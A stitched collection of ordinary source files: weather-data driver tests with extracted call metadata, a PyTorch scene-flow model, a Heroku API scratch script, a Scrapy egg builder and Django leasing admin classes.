expected = [dt.datetime(1970, 1, 1)]
assert actual == expected
def test_driver_points_given_start_time_query():
settings = nearcast.Settings(pattern=os.path.join(SAMPLE_DIR, "*GRIB2"))
start_date = dt.datetime(2021, 1, 21, 0, 30, tzinfo=UTC)
query = {nearcast.DIMENSION.start_time.name: start_date}
dim_name = nearcast.DIMENSION.time.name
data_var = "U component of wind"
response = driver.points(settings, data_var, dim_name, query=query)
actual = response["data"][0]
expected = start_date
assert actual == expected
def test_driver_tilable(settings, data_var):
time = dt.datetime(2019, 12, 16, 14, 30, tzinfo=UTC)
timestamp_ms = time.timestamp() * 1000
query = {
"time": timestamp_ms
}
actual = driver.tilable(settings, data_var, query=query)
expected = (300,)
assert actual["latitude"].shape == expected
def test_get_validity(sample_file, data_var):
actual = list(get_validity(sample_file, data_var))
expected = [dt.datetime(2019, 12, 16, 14, 30, tzinfo=UTC)]
assert actual == expected
def test_get_first_fixed_surface(sample_file, data_var):
actual = list(get_first_fixed_surface(sample_file, data_var))
expected = [1]
assert actual == expected
def test_get_data_vars_given_sample_file(sample_file):
actual = list(get_data_vars(sample_file))
expected = [{
"name": "Pseudo-adiabatic potential temperature",
"units": "K"
}]
assert actual == expected
def test_get_data_vars_given_real_file(real_file):
actual = list(get_data_vars(real_file))
expected = [{
"name": "Pseudo-adiabatic potential temperature",
"units": "K"
}, {
"name": "Precipitable water",
"units": "kg m**-2"
}, {
"name": "U component of wind",
"units": "m s**-1"
}, {
"name": "V component of wind",
"units": "m s**-1"
}]
def tuples(items):
return set([(item["name"], item["units"]) for item in items])
assert tuples(actual) == tuples(expected)
@pytest.mark.parametrize("var_name", [
"Pseudo-adiabatic potential temperature",
"Precipitable water",
"U component of wind",
"V component of wind",
])
def test_get_first_fixed_surface_given_real_file(real_file, var_name):
actual = sorted(set((get_first_fixed_surface(real_file, var_name))))
# expected = [1, 699999988, 899999976]
expected = [1, 699, 899]
assert actual == expected
@pytest.mark.parametrize("var_name", [
"Pseudo-adiabatic potential temperature",
"Precipitable water",
"U component of wind",
"V component of wind",
])
def test_get_validity_given_real_file(real_file, var_name):
start = dt.datetime(2021, 1, 25, 0, 0, tzinfo=UTC)
actual = sorted(set((get_validity(real_file, var_name))))
expected = [start + i * dt.timedelta(minutes=30) for i in range(19)]
assert actual == expected
def test_get_validity_given_real_file_unknown_variable(real_file):
actual = sorted(set((get_validity(real_file, "foo"))))
expected = []
assert actual == expected
def test_parse_date_given_real_file(real_file):
assert parse_date(real_file) == dt.datetime(2021, 1, 25, tzinfo=UTC)
def test_tilable_given_real_file(real_file):
settings = {"pattern": real_file}
data_var = "U component of wind"
time = dt.datetime(2021, 1, 25, 0, 0, 0, tzinfo=UTC)
timestamp_ms = time.timestamp() * 1000
level = 699999988
query = {
"start_time": 0,
"time": timestamp_ms,
"level": level
}
json = driver.tilable(settings, data_var, query=query)
actual = json["values"]
expected = [1, 2, 3]
assert actual[0, 0] == -7.644691467285156e-1
# assert_array_almost_equal(actual, expected)
@pytest.mark.parametrize("date,expected", [
(dt.datetime(1970, 1, 1, 0, 0, 0, tzinfo=UTC), 0),
(dt.datetime(2021, 1, 25, 0, 0, 0, tzinfo=UTC), 1611532800),
])
def test_datetime_to_timestamp(date, expected):
assert date.timestamp() == expected
def test_pygrib_select_real_file(real_file):
name = "U component of wind"
messages = pygrib.index(real_file,
"name",
"validityTime",
"scaledValueOfFirstFixedSurface")
time = 0 # NOTE: zero-padded strings raise Runtime errors
# level = 899999976
level = 899
actual = []
for message in messages.select(name=name,
validityTime=time,
scaledValueOfFirstFixedSurface=level):
actual.append(message["scaledValueOfFirstFixedSurface"])
messages.close()
assert actual == [level]
@pytest.mark.parametrize("date,path,time", [
pytest.param(dt.datetime(2021, 1, 25, 0, 31, tzinfo=UTC),
"NEARCAST_20210125_0030_LAKEVIC_LATLON.GRIB2",
dt.datetime(2021, 1, 25, 0, 30, tzinfo=UTC), id="during"),
pytest.param(dt.datetime(2021, 1, 26, 0, 0, tzinfo=UTC),
"NEARCAST_20210125_0100_LAKEVIC_LATLON.GRIB2",
dt.datetime(2021, 1, 25, 1, 0, tzinfo=UTC), id="after"),
pytest.param(dt.datetime(2021, 1, 20, 0, 0, tzinfo=UTC),
"NEARCAST_20210125_0000_LAKEVIC_LATLON.GRIB2",
dt.datetime(2021, 1, 25, 0, 0, tzinfo=UTC), id="before"),
])
def test_find_nearest(date, path, time):
file_names = ["NEARCAST_20210125_0000_LAKEVIC_LATLON.GRIB2",
"NEARCAST_20210125_0030_LAKEVIC_LATLON.GRIB2",
"NEARCAST_20210125_0100_LAKEVIC_LATLON.GRIB2"]
actual = nearcast.find_nearest(file_names, date)
assert actual.path == path
assert actual.timestamp == time
|
[
"forest_lite.server.drivers.nearcast.driver.description",
"forest_lite.server.drivers.nearcast.driver.points",
"forest_lite.server.drivers.nearcast.find_nearest",
"forest_lite.server.drivers.nearcast.parse_date",
"os.path.dirname",
"pygrib.index",
"forest_lite.server.drivers.nearcast.get_data_vars",
"datetime.datetime",
"datetime.timedelta",
"pytz.timezone",
"forest_lite.server.drivers.nearcast.driver.tilable",
"forest_lite.server.drivers.nearcast.get_first_fixed_surface",
"pytest.mark.parametrize",
"os.path.join",
"forest_lite.server.drivers.nearcast.get_validity"
] |
[((554, 574), 'pytz.timezone', 'pytz.timezone', (['"""UTC"""'], {}), "('UTC')\n", (567, 574), False, 'import pytz\n'), ((4179, 4335), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""var_name"""', "['Pseudo-adiabatic potential temperature', 'Precipitable water',\n 'U component of wind', 'V component of wind']"], {}), "('var_name', [\n 'Pseudo-adiabatic potential temperature', 'Precipitable water',\n 'U component of wind', 'V component of wind'])\n", (4202, 4335), False, 'import pytest\n'), ((4595, 4751), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""var_name"""', "['Pseudo-adiabatic potential temperature', 'Precipitable water',\n 'U component of wind', 'V component of wind']"], {}), "('var_name', [\n 'Pseudo-adiabatic potential temperature', 'Precipitable water',\n 'U component of wind', 'V component of wind'])\n", (4618, 4751), False, 'import pytest\n'), ((601, 626), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (616, 626), False, 'import os\n'), ((684, 755), 'os.path.join', 'os.path.join', (['SAMPLE_DIR', '"""NEARCAST_20210125_0000_LAKEVIC_LATLON.GRIB2"""'], {}), "(SAMPLE_DIR, 'NEARCAST_20210125_0000_LAKEVIC_LATLON.GRIB2')\n", (696, 755), False, 'import os\n'), ((828, 870), 'os.path.join', 'os.path.join', (['SAMPLE_DIR', '"""nearcast.grib2"""'], {}), "(SAMPLE_DIR, 'nearcast.grib2')\n", (840, 870), False, 'import os\n'), ((1890, 1912), 'forest_lite.server.drivers.nearcast.parse_date', 'parse_date', (['object_key'], {}), '(object_key)\n', (1900, 1912), False, 'from forest_lite.server.drivers.nearcast import driver, parse_date, get_data_vars, get_first_fixed_surface, get_validity\n'), ((2328, 2371), 'datetime.datetime', 'dt.datetime', (['(2021)', '(1)', '(21)', '(0)', '(30)'], {'tzinfo': 'UTC'}), '(2021, 1, 21, 0, 30, tzinfo=UTC)\n', (2339, 2371), True, 'import datetime as dt\n'), ((2529, 2585), 'forest_lite.server.drivers.nearcast.driver.points', 'driver.points', (['settings', 'data_var', 'dim_name'], {'query': 'query'}), '(settings, data_var, dim_name, query=query)\n', (2542, 2585), False, 'from forest_lite.server.drivers.nearcast import driver, parse_date, get_data_vars, get_first_fixed_surface, get_validity\n'), ((2733, 2778), 'datetime.datetime', 'dt.datetime', (['(2019)', '(12)', '(16)', '(14)', '(30)'], {'tzinfo': 'UTC'}), '(2019, 12, 16, 14, 30, tzinfo=UTC)\n', (2744, 2778), True, 'import datetime as dt\n'), ((2884, 2931), 'forest_lite.server.drivers.nearcast.driver.tilable', 'driver.tilable', (['settings', 'data_var'], {'query': 'query'}), '(settings, data_var, query=query)\n', (2898, 2931), False, 'from forest_lite.server.drivers.nearcast import driver, parse_date, get_data_vars, get_first_fixed_surface, get_validity\n'), ((4834, 4876), 'datetime.datetime', 'dt.datetime', (['(2021)', '(1)', '(25)', '(0)', '(0)'], {'tzinfo': 'UTC'}), '(2021, 1, 25, 0, 0, tzinfo=UTC)\n', (4845, 4876), True, 'import datetime as dt\n'), ((5474, 5519), 'datetime.datetime', 'dt.datetime', (['(2021)', '(1)', '(25)', '(0)', '(0)', '(0)'], {'tzinfo': 'UTC'}), '(2021, 1, 25, 0, 0, 0, tzinfo=UTC)\n', (5485, 5519), True, 'import datetime as dt\n'), ((5694, 5741), 'forest_lite.server.drivers.nearcast.driver.tilable', 'driver.tilable', (['settings', 'data_var'], {'query': 'query'}), '(settings, data_var, query=query)\n', (5708, 5741), False, 'from forest_lite.server.drivers.nearcast import driver, parse_date, get_data_vars, get_first_fixed_surface, get_validity\n'), ((6246, 6331), 'pygrib.index', 'pygrib.index', (['real_file', '"""name"""', '"""validityTime"""', '"""scaledValueOfFirstFixedSurface"""'], {}), "(real_file, 'name', 'validityTime',\n 'scaledValueOfFirstFixedSurface')\n", (6258, 6331), False, 'import pygrib\n'), ((7720, 7759), 'forest_lite.server.drivers.nearcast.find_nearest', 'nearcast.find_nearest', (['file_names', 'date'], {}), '(file_names, date)\n', (7741, 7759), False, 'from forest_lite.server.drivers import nearcast\n'), ((2060, 2103), 'forest_lite.server.drivers.nearcast.driver.points', 'driver.points', (['settings', 'data_var', 'dim_name'], {}), '(settings, data_var, dim_name)\n', (2073, 2103), False, 'from forest_lite.server.drivers.nearcast import driver, parse_date, get_data_vars, get_first_fixed_surface, get_validity\n'), ((2128, 2151), 'datetime.datetime', 'dt.datetime', (['(1970)', '(1)', '(1)'], {}), '(1970, 1, 1)\n', (2139, 2151), True, 'import datetime as dt\n'), ((3068, 3103), 'forest_lite.server.drivers.nearcast.get_validity', 'get_validity', (['sample_file', 'data_var'], {}), '(sample_file, data_var)\n', (3080, 3103), False, 'from forest_lite.server.drivers.nearcast import driver, parse_date, get_data_vars, get_first_fixed_surface, get_validity\n'), ((3121, 3166), 'datetime.datetime', 'dt.datetime', (['(2019)', '(12)', '(16)', '(14)', '(30)'], {'tzinfo': 'UTC'}), '(2019, 12, 16, 14, 30, tzinfo=UTC)\n', (3132, 3166), True, 'import datetime as dt\n'), ((3275, 3321), 'forest_lite.server.drivers.nearcast.get_first_fixed_surface', 'get_first_fixed_surface', (['sample_file', 'data_var'], {}), '(sample_file, data_var)\n', (3298, 3321), False, 'from forest_lite.server.drivers.nearcast import driver, parse_date, get_data_vars, get_first_fixed_surface, get_validity\n'), ((3447, 3473), 'forest_lite.server.drivers.nearcast.get_data_vars', 'get_data_vars', (['sample_file'], {}), '(sample_file)\n', (3460, 3473), False, 'from forest_lite.server.drivers.nearcast import driver, parse_date, get_data_vars, get_first_fixed_surface, get_validity\n'), ((3680, 3704), 'forest_lite.server.drivers.nearcast.get_data_vars', 'get_data_vars', (['real_file'], {}), '(real_file)\n', (3693, 3704), False, 'from forest_lite.server.drivers.nearcast import driver, parse_date, get_data_vars, get_first_fixed_surface, get_validity\n'), ((5279, 5300), 'forest_lite.server.drivers.nearcast.parse_date', 'parse_date', (['real_file'], {}), '(real_file)\n', (5289, 5300), False, 'from forest_lite.server.drivers.nearcast import driver, parse_date, get_data_vars, get_first_fixed_surface, get_validity\n'), ((5304, 5340), 'datetime.datetime', 'dt.datetime', (['(2021)', '(1)', '(25)'], {'tzinfo': 'UTC'}), '(2021, 1, 25, tzinfo=UTC)\n', (5315, 5340), True, 'import datetime as dt\n'), ((1152, 1180), 'forest_lite.server.drivers.nearcast.driver.description', 'driver.description', (['settings'], {}), '(settings)\n', (1170, 1180), False, 'from forest_lite.server.drivers.nearcast import driver, parse_date, get_data_vars, get_first_fixed_surface, get_validity\n'), ((1699, 1735), 'datetime.datetime', 'dt.datetime', (['(2021)', '(1)', '(25)'], {'tzinfo': 'UTC'}), '(2021, 1, 25, tzinfo=UTC)\n', (1710, 1735), True, 'import datetime as dt\n'), ((2275, 2309), 'os.path.join', 'os.path.join', (['SAMPLE_DIR', '"""*GRIB2"""'], {}), "(SAMPLE_DIR, '*GRIB2')\n", (2287, 2309), False, 'import os\n'), ((4442, 4486), 'forest_lite.server.drivers.nearcast.get_first_fixed_surface', 'get_first_fixed_surface', (['real_file', 'var_name'], {}), '(real_file, var_name)\n', (4465, 4486), False, 'from forest_lite.server.drivers.nearcast import driver, parse_date, get_data_vars, get_first_fixed_surface, get_validity\n'), ((4902, 4935), 'forest_lite.server.drivers.nearcast.get_validity', 'get_validity', (['real_file', 'var_name'], {}), '(real_file, var_name)\n', (4914, 4935), False, 'from forest_lite.server.drivers.nearcast import driver, parse_date, get_data_vars, get_first_fixed_surface, get_validity\n'), ((5136, 5166), 'forest_lite.server.drivers.nearcast.get_validity', 'get_validity', (['real_file', '"""foo"""'], {}), "(real_file, 'foo')\n", (5148, 5166), False, 'from forest_lite.server.drivers.nearcast import driver, parse_date, get_data_vars, get_first_fixed_surface, get_validity\n'), ((5945, 5989), 'datetime.datetime', 'dt.datetime', (['(1970)', '(1)', '(1)', '(0)', '(0)', '(0)'], {'tzinfo': 'UTC'}), '(1970, 1, 1, 0, 0, 0, tzinfo=UTC)\n', (5956, 5989), True, 'import datetime as dt\n'), ((6000, 6045), 'datetime.datetime', 'dt.datetime', (['(2021)', '(1)', '(25)', '(0)', '(0)', '(0)'], {'tzinfo': 'UTC'}), '(2021, 1, 25, 0, 0, 0, tzinfo=UTC)\n', (6011, 6045), True, 'import datetime as dt\n'), ((6884, 6927), 'datetime.datetime', 'dt.datetime', (['(2021)', '(1)', '(25)', '(0)', '(31)'], {'tzinfo': 'UTC'}), '(2021, 1, 25, 0, 31, tzinfo=UTC)\n', (6895, 6927), True, 'import datetime as dt\n'), ((7010, 7053), 'datetime.datetime', 'dt.datetime', (['(2021)', '(1)', '(25)', '(0)', '(30)'], {'tzinfo': 'UTC'}), '(2021, 1, 25, 0, 30, tzinfo=UTC)\n', (7021, 7053), True, 'import datetime as dt\n'), ((7086, 7128), 'datetime.datetime', 'dt.datetime', (['(2021)', '(1)', '(26)', '(0)', '(0)'], {'tzinfo': 'UTC'}), '(2021, 1, 26, 0, 0, tzinfo=UTC)\n', (7097, 7128), True, 'import datetime as dt\n'), ((7211, 7253), 'datetime.datetime', 'dt.datetime', (['(2021)', '(1)', '(25)', '(1)', '(0)'], {'tzinfo': 'UTC'}), '(2021, 1, 25, 1, 0, tzinfo=UTC)\n', (7222, 7253), True, 'import datetime as dt\n'), ((7285, 7327), 'datetime.datetime', 'dt.datetime', (['(2021)', '(1)', '(20)', '(0)', '(0)'], {'tzinfo': 'UTC'}), '(2021, 1, 20, 0, 0, tzinfo=UTC)\n', (7296, 7327), True, 'import datetime as dt\n'), ((7410, 7452), 'datetime.datetime', 'dt.datetime', (['(2021)', '(1)', '(25)', '(0)', '(0)'], {'tzinfo': 'UTC'}), '(2021, 1, 25, 0, 0, tzinfo=UTC)\n', (7421, 7452), True, 'import datetime as dt\n'), ((4967, 4991), 'datetime.timedelta', 'dt.timedelta', ([], {'minutes': '(30)'}), '(minutes=30)\n', (4979, 4991), True, 'import datetime as dt\n')]
|
import torch
import torch.nn as nn
from model.extractor import FlotEncoder
from model.corr import CorrBlock
from model.update import UpdateBlock
from model.refine import FlotRefine
class RSF(nn.Module):
def __init__(self, args):
super(RSF, self).__init__()
self.hidden_dim = 64
self.context_dim = 64
self.feature_extractor = FlotEncoder()
self.context_extractor = FlotEncoder()
self.corr_block = CorrBlock(num_levels=args.corr_levels, base_scale=args.base_scales,
resolution=3, truncate_k=args.truncate_k)
self.update_block = UpdateBlock(hidden_dim=self.hidden_dim)
# self.refine_block = FlotRefine()
def forward(self, p, num_iters=12):
# feature extraction
[xyz1, xyz2] = p
fmap1, graph = self.feature_extractor(p[0])
fmap2, _ = self.feature_extractor(p[1])
# correlation matrix
self.corr_block.init_module(fmap1, fmap2, xyz2)
fct1, graph_context = self.context_extractor(p[0])
net, inp = torch.split(fct1, [self.hidden_dim, self.context_dim], dim=1)
net = torch.tanh(net)
inp = torch.relu(inp)
coords1, coords2 = xyz1, xyz1
flow_predictions = []
for itr in range(num_iters):
coords2 = coords2.detach()
corr = self.corr_block(coords=coords2)
flow = coords2 - coords1
net, delta_flow = self.update_block(net, inp, corr, flow, graph_context)
coords2 = coords2 + delta_flow
flow_predictions.append(coords2 - coords1)
# refined_flow = self.refine_block(coords2 - coords1, graph)
# flow_predictions.append(refined_flow)
return flow_predictions
|
[
"torch.relu",
"model.update.UpdateBlock",
"model.extractor.FlotEncoder",
"torch.split",
"model.corr.CorrBlock",
"torch.tanh"
] |
[((364, 377), 'model.extractor.FlotEncoder', 'FlotEncoder', ([], {}), '()\n', (375, 377), False, 'from model.extractor import FlotEncoder\n'), ((411, 424), 'model.extractor.FlotEncoder', 'FlotEncoder', ([], {}), '()\n', (422, 424), False, 'from model.extractor import FlotEncoder\n'), ((451, 564), 'model.corr.CorrBlock', 'CorrBlock', ([], {'num_levels': 'args.corr_levels', 'base_scale': 'args.base_scales', 'resolution': '(3)', 'truncate_k': 'args.truncate_k'}), '(num_levels=args.corr_levels, base_scale=args.base_scales,\n resolution=3, truncate_k=args.truncate_k)\n', (460, 564), False, 'from model.corr import CorrBlock\n'), ((625, 664), 'model.update.UpdateBlock', 'UpdateBlock', ([], {'hidden_dim': 'self.hidden_dim'}), '(hidden_dim=self.hidden_dim)\n', (636, 664), False, 'from model.update import UpdateBlock\n'), ((1069, 1130), 'torch.split', 'torch.split', (['fct1', '[self.hidden_dim, self.context_dim]'], {'dim': '(1)'}), '(fct1, [self.hidden_dim, self.context_dim], dim=1)\n', (1080, 1130), False, 'import torch\n'), ((1145, 1160), 'torch.tanh', 'torch.tanh', (['net'], {}), '(net)\n', (1155, 1160), False, 'import torch\n'), ((1175, 1190), 'torch.relu', 'torch.relu', (['inp'], {}), '(inp)\n', (1185, 1190), False, 'import torch\n')]
|
# coding=utf-8
import os
from pprint import pprint # noqa
# Third party libraries
import heroku3
# import socket
# import httplib
# import logging
# httplib.HTTPConnection.debuglevel = 1
# logging.basicConfig() # you need to initialize logging, otherwise you will not see anything from requests
# logging.getLogger().setLevel(logging.INFO)
# requests_log = logging.getLogger("requests.packages.urllib3")
# requests_log.setLevel(logging.INFO)
# requests_log.propagate = True
HEROKU_API_KEY = os.environ.get("HEROKU_API_KEY", False)
HEROKU_APPNAME = os.environ.get("HEROKU_APPNAME", False)
TEST_EMAIL = os.environ.get("TEST_EMAIL", False)
heroku_conn = heroku3.from_key(HEROKU_API_KEY)
# app = heroku_conn.create_app(name='testy2124app', stack_id_or_name='cedar', region_id_or_name='us')
# print(app.addons())
# print(heroku_conn.addons('testy123app'))
# for addon in app.addons():
# addon.delete()
# del config['TEST1']
# del config['TEST2']
# del config['TEST3']
# del config['Z01']
# del config['Z02']
# print(config)
# config['TEST1'] = u'MM1'
# config['TEST2'] = u'MM2'
# config['TEST3'] = u'MM3'
# config2 = heroku_conn.update_appconfig('testy123app', {u'Z01': u'A1', u'Z02': u'A2'})
# config2 = config.update({u'Z01': u'A1', u'Z02': u'A2'})
# config3 = app.config()
# print(config)
# print("======")
# print(config2)
# print("======")
# print(config3)
# print(config['TEST1'])
# print(config['TEST3'])
# app = heroku_conn.app('kdsjhkszdjhgksjdhfkj')
# procs = app.process_formation()
# proc = app.process_formation()['web']
# print(proc.size)
# print(proc.quantity)
# print(procs)
# proc.scale(0)
# app.scale_formation_process('web', 1)
# output = app.run_command('pgbackups:url')
# collab = app.add_collaborator(email=TEST_EMAIL, silent=False)
# collab = app.remove_collaborator(TEST_EMAIL)
# print(newapp.collaborators())
# config = newapp.config()
# config['TEST2'] = None
# print(newapp.domains())
# domain2 = newapp.add_domain('testy123.testing.com')
# print(newapp.domains())
# newapp.remove_domain('testy123.testing.com')
# domain.remove()
# print(newapp.domains())
# app = heroku_conn.app(HEROKU_APPNAME)
# pprint(app.addons())
# dynos = app.dynos()
# dyno = dynos['web.1']
# print(dyno)
# releases = app.releases(sort='asc')
# for release in releases:
# print("{0} {1} {2} {3}".format(release.id, release.commit, release.user, release.description))
# releases = app.releases()._items.reverse()
# print(releases.pop())
# print(releases.pop())
# app.rollback('v108')
# apps = heroku_conn.apps(order_by='name', limit=1, sort='asc')
# apps = heroku_conn.apps(order_by='name', limit=1)
apps = heroku_conn.apps(order_by="name", sort="asc")
for app in apps:
print(app.name)
# app.rename('testy223')
# print(app.enable_maintenance_mode())
# print(app.disable_maintenance_mode())
# app.enable_feature('user-env-compile')
# app.disable_feature('user-env-compile')
# print(app.labs())
# print(heroku_conn.features())
# domain = app.add_domain('test123-1.testing.com')
# domain = app.add_domain('test123-2.testing.com')
# domain = app.add_domain('test123-3.testing.com')
# domain = app.add_domain('test123-4.testing.com')
# domain = app.add_domain('test123-5.testing.com')
# domain = app.add_domain('test123-6.testing.com')
# domain = app.add_domain('test123-7.testing.com')
# iterator = app.stream_log(lines=1)
# for line in iterator:
# filter out keep-alive new lines
# if line:
# print("{0}".format(line))
# logs = app.get_log(lines=100)
# print(logs)
# print(app.domains(limit=1))
# dyno = app.run_command('fab -l', printout=True)
# dyno.remove()
# proc = heroku_conn.apps()['testy123app'].process_formation()['web']
# print(proc.size)
# print(proc.quantity)
# formations = app.process_formation()
# print(formations['web'])
# for formation in formations:
# formation.resize(1)
# print(app._h._last_request_id)
# print(app.dynos()['web.1'])
# print(dynos['web.1'])
# print(heroku_conn.apps()['testy123app'])
# print(heroku_conn.apps()['d32b74d8-f5cf-4e3e-95dd-a601668fdb0c'])
# for dyno in app.dynos():
# print(dyno)
# print(dyno.command)
# dyno.restart()
# app.restart()
# del config['TEST2']
# newapp.remove_collaborator('<EMAIL>')
# collab.remove()
# pprint(newapp.addons)
# app = heroku_conn.app('testy123app')
# for addon in app.addons:
# print(addon.app.name, " - ", addon.plan.name)
# addons = heroku_conn.addon_services()
# pprint(addons)
# pg_addon = heroku_conn.addon_services('6235c964-8b3c-47e0-952f-8d8f6a2d53f5')
# pg_addon = heroku_conn.addon_services(id_or_name='heroku-postgresql')
# pprint(pg_addon)
# for addon in addons:
# print(addon.name, " - ", addon.id, " - ", addon.id, " - ", addon.price)
# addon.upgrade(plan_id_or_name='heroku-postgresql:basic')
# addon.delete()
# buildpack_urls = [
# 'https://github.com/some/buildpack', 'https://github.com/another/buildpack'
# ]
# app.update_buildpacks([buildpack_urls])
# buildpack_urls can also be empty. This clears all buildpacks:
# app.update_buildpacks([])
# app.delete()
print(heroku_conn._last_request_id)
|
[
"os.environ.get",
"heroku3.from_key"
] |
[((496, 535), 'os.environ.get', 'os.environ.get', (['"""HEROKU_API_KEY"""', '(False)'], {}), "('HEROKU_API_KEY', False)\n", (510, 535), False, 'import os\n'), ((553, 592), 'os.environ.get', 'os.environ.get', (['"""HEROKU_APPNAME"""', '(False)'], {}), "('HEROKU_APPNAME', False)\n", (567, 592), False, 'import os\n'), ((606, 641), 'os.environ.get', 'os.environ.get', (['"""TEST_EMAIL"""', '(False)'], {}), "('TEST_EMAIL', False)\n", (620, 641), False, 'import os\n'), ((657, 689), 'heroku3.from_key', 'heroku3.from_key', (['HEROKU_API_KEY'], {}), '(HEROKU_API_KEY)\n', (673, 689), False, 'import heroku3\n')]
|
from scrapy.utils.python import retry_on_eintr
from scrapy.utils.conf import get_config, closest_scrapy_cfg
import os
import sys
import glob
from subprocess import check_call
_SETUP_PY_TEMPLATE = """
# Automatically created by: scrapydd
from setuptools import setup, find_packages
setup(
name = '%(project)s',
version = '1.0',
packages = find_packages(),
entry_points = {'scrapy': ['settings = %(settings)s']},
install_requires = [],
)
""".lstrip()
def _create_default_setup_py(**kwargs):
with open('setup.py', 'w') as f:
f.write(_SETUP_PY_TEMPLATE % kwargs)
def _build_egg():
closest = closest_scrapy_cfg()
os.chdir(os.path.dirname(closest))
if not os.path.exists('setup.py'):
scrapy_project_settings = get_config()
settings = scrapy_project_settings.get('settings', 'default')
project = scrapy_project_settings.get('deploy', 'project')
_create_default_setup_py(settings=settings, project=project)
d = 'dist'
retry_on_eintr(check_call, [sys.executable, 'setup.py', 'clean', '-a', 'bdist_egg', '-d', d],
stdout=sys.stdout, stderr=sys.stderr)
egg = glob.glob(os.path.join(d, '*.egg'))[0]
return egg, d
class PackageCommand():
def run(self):
egg, d = _build_egg()
print("Egg has been built: %s" % egg)
|
[
"scrapy.utils.conf.closest_scrapy_cfg",
"scrapy.utils.python.retry_on_eintr",
"os.path.dirname",
"os.path.exists",
"scrapy.utils.conf.get_config",
"os.path.join"
] |
[((667, 687), 'scrapy.utils.conf.closest_scrapy_cfg', 'closest_scrapy_cfg', ([], {}), '()\n', (685, 687), False, 'from scrapy.utils.conf import get_config, closest_scrapy_cfg\n'), ((1046, 1181), 'scrapy.utils.python.retry_on_eintr', 'retry_on_eintr', (['check_call', "[sys.executable, 'setup.py', 'clean', '-a', 'bdist_egg', '-d', d]"], {'stdout': 'sys.stdout', 'stderr': 'sys.stderr'}), "(check_call, [sys.executable, 'setup.py', 'clean', '-a',\n 'bdist_egg', '-d', d], stdout=sys.stdout, stderr=sys.stderr)\n", (1060, 1181), False, 'from scrapy.utils.python import retry_on_eintr\n'), ((702, 726), 'os.path.dirname', 'os.path.dirname', (['closest'], {}), '(closest)\n', (717, 726), False, 'import os\n'), ((740, 766), 'os.path.exists', 'os.path.exists', (['"""setup.py"""'], {}), "('setup.py')\n", (754, 766), False, 'import os\n'), ((803, 815), 'scrapy.utils.conf.get_config', 'get_config', ([], {}), '()\n', (813, 815), False, 'from scrapy.utils.conf import get_config, closest_scrapy_cfg\n'), ((1219, 1243), 'os.path.join', 'os.path.join', (['d', '"""*.egg"""'], {}), "(d, '*.egg')\n", (1231, 1243), False, 'import os\n')]
|
from django.contrib.gis import admin
from django.utils.translation import ugettext_lazy as _
from enumfields.admin import EnumFieldListFilter
from field_permissions.admin import FieldPermissionsAdminMixin
from leasing.models import (
Area,
AreaNote,
AreaSource,
BankHoliday,
BasisOfRent,
BasisOfRentBuildPermissionType,
BasisOfRentDecision,
BasisOfRentPlotType,
BasisOfRentPropertyIdentifier,
BasisOfRentRate,
Collateral,
CollateralType,
CollectionCourtDecision,
CollectionLetter,
CollectionLetterTemplate,
CollectionNote,
Comment,
CommentTopic,
Condition,
ConditionType,
ConstructabilityDescription,
Contact,
Contract,
ContractChange,
ContractRent,
ContractType,
Decision,
DecisionMaker,
DecisionType,
District,
Financing,
FixedInitialYearRent,
Hitas,
Index,
Inspection,
IntendedUse,
InterestRate,
Invoice,
Lease,
LeaseArea,
LeaseBasisOfRent,
LeaseholdTransfer,
LeaseholdTransferImportLog,
LeaseholdTransferParty,
LeaseholdTransferProperty,
LeaseIdentifier,
LeaseStateLog,
LeaseType,
Management,
Municipality,
NoticePeriod,
PlanUnit,
PlanUnitState,
PlanUnitType,
Plot,
PlotSearch,
PlotSearchStage,
PlotSearchSubtype,
PlotSearchType,
ReceivableType,
Regulation,
RelatedLease,
Rent,
RentAdjustment,
RentDueDate,
RentIntendedUse,
SpecialProject,
StatisticalUse,
SupportiveHousing,
Tenant,
TenantContact,
UiData,
Vat,
)
from leasing.models.infill_development_compensation import (
InfillDevelopmentCompensation,
InfillDevelopmentCompensationAttachment,
InfillDevelopmentCompensationDecision,
InfillDevelopmentCompensationIntendedUse,
InfillDevelopmentCompensationLease,
)
from leasing.models.invoice import InvoiceNote, InvoicePayment, InvoiceRow, InvoiceSet
from leasing.models.land_area import (
LeaseAreaAddress,
PlanUnitIntendedUse,
PlotDivisionState,
)
from leasing.models.land_use_agreement import (
LandUseAgreement,
LandUseAgreementAddress,
LandUseAgreementConditionFormOfManagement,
LandUseAgreementDecision,
LandUseAgreementDecisionCondition,
LandUseAgreementDecisionConditionType,
LandUseAgreementDecisionType,
LandUseAgreementDefinition,
LandUseAgreementStatus,
LandUseAgreementType,
)
from leasing.models.lease import ReservationProcedure
class CenterOnHelsinkiOSMGeoAdmin(admin.OSMGeoAdmin):
# Position 24.945, 60.192 (SRID 4326) transformed to SRID 900913
default_lon = 2776864.697838209
default_lat = 8442609.191245062
default_zoom = 11
class AreaNoteAdmin(FieldPermissionsAdminMixin, CenterOnHelsinkiOSMGeoAdmin):
pass
class FieldPermissionsModelAdmin(FieldPermissionsAdminMixin, admin.ModelAdmin):
pass
class NameAdmin(FieldPermissionsModelAdmin):
list_display = ("name",)
search_fields = ["name"]
class AreaAdmin(CenterOnHelsinkiOSMGeoAdmin):
list_display = ("identifier", "type", "source")
list_filter = (("type", EnumFieldListFilter), "source")
search_fields = ["identifier"]
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related("source")
class AreaSourceAdmin(admin.ModelAdmin):
list_display = ("name", "identifier")
search_fields = ["name", "identifier"]
class ContactAdmin(FieldPermissionsModelAdmin):
list_display = ("__str__", "type", "is_lessor")
search_fields = ["first_name", "last_name", "name"]
class MunicipalityAdmin(admin.ModelAdmin):
list_display = ("name", "identifier")
search_fields = ["name", "identifier"]
readonly_fields = ("id",)
class DistrictAdmin(admin.ModelAdmin):
list_display = ("name", "municipality", "identifier")
search_fields = ["name", "municipality__name", "identifier"]
class TenantContactAdmin(FieldPermissionsModelAdmin):
list_display = ("get_lease_identifier", "tenant", "type", "contact")
raw_id_fields = ("tenant", "contact")
def get_lease_identifier(self, obj):
return str(obj.tenant.lease)
get_lease_identifier.short_description = _("Lease")
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related(
"tenant",
"contact",
"tenant__lease__type",
"tenant__lease__municipality",
"tenant__lease__district",
"tenant__lease__identifier",
"tenant__lease__identifier__type",
"tenant__lease__identifier__municipality",
"tenant__lease__identifier__district",
)
